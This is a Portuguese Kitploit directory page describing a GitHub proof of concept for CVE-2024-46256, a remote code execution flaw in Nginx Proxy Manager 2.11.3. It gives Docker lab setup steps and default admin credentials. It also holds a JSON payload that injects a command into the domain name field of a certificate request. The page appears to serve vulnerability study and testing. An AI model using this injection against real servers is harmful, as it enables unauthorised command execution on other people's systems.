Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46256 — Ferramenta CVE-2024-46256 | Kitploit
Ferramentas/GitHubGitHub/kimtangker/cve-2024-46256
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

Ferramenta CVE-2024-46256

Ver Repositório
8há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-46256 Análise da Vulnerabilidade RCE do Nginx Proxy Manager

Configuração do Ambiente

1. Executar o ambiente Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

Ou você pode usar o script automático:

root@kitploit:~

python setup_environment.py

2. Acessar o Nginx Proxy Manager

  • URL: http://localhost:81

  • Após concluir a configuração inicial, prossiga com os testes

  • Faça login com a conta de administrador padrão (e-mail: [email protected] / senha: changeme)

  • Verifique a permissão de acesso aos recursos relacionados à emissão de certificados

Informações da Vulnerabilidade

  • CVE ID: CVE-2024-46256

  • : Nginx Proxy Manager

Baixar ferramenta
Produto
  • Versão: 2.11.3

  • Tipo de Vulnerabilidade: Remote Code Execution (RCE)

  • CVSS: High

  • Código PoC

    O PoC causa RCE ao permitir que um usuário autenticado execute injeção de template/comando no campo de nome de domínio durante o processo de solicitação de emissão de certificado (ex.: Let's Encrypt).

    Exemplo de payload (exemplo conceitual):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Ambiente de Análise

    • OS: Windows 10

    • Docker: versão mais recente

    • Nginx Proxy Manager: 2.11.3